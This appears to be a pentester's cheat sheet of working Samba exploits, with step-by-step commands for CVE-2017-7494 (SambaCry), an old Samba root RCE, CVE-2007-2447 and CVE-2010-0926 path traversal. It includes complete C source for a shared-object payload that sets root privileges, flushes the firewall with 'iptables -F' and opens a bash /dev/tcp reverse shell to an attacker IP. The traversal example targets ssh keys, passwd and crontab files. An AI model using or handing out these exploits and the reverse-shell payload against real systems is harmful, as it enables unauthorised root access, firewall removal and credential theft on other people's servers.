Samba Cry

Must have a writable share on samba < 4.5.9

  1. Use the CVE-2017-7494 tool (https://github.com/joxeankoret/CVE-2017-7494) Python 2
  2. Use the reverseshell.c below (change IP and PORT)
  3. Compile it using gcc -o reverseshell.so -shared reverseshell.c -fPIC
  4. Set up listener. Run the exploit using python cve_2017_7494.py -t IP -u user -P pass --custom reverseshell.so

reverseshell.c 

#include <stdio.h>
#include <stdlib.h>

static void smash() __attribute__((constructor));

void smash() {
setresuid(0,0,0);
system("iptables -F");
system("bash -c 'bash -i >& /dev/tcp/IP/PORT 0>&1'");
}

Samba Root RCE

Need to be < samba 2.2.8

  1. (optional) To find out samba version, use wireshark and monitor the tunnel. Run enum4linux -U IP and go back to wireshark, right click on session setup andx request, user: anonymous and follow TCP stream. Should be able to see Samba version.
  2. Use exploit 10 (searchsploit -m 10). gcc 10.c -o sambal, then run ./sambal -b 0 IP

Samba usermap script

  1. python CVE-2007-2447.py targetIP targetport ownIP ownPort (usually target port will be 139)

Any samba version before 3.3.11, 3.4.x-3.4.6, 3.5.x-3.5.0rc3. Must have one writable share.

  1. Using the executable (try not to compile yourself, I failed) CVE-2010-0926 with the usage below: ./CVE-2010-0926 hostname sharename randomnewfoldername pathtoread (Eg: ./CVE-2010-0926 10.11.1.136 'Bob Share' rootdir ../../../../../../../../../../ will create a rootdir folder in the ‘Bob Share’ drive that allows you to read ../../../../…..)
  2. Can search for interesting things like backup of ssh key, passwd file, crontab etc.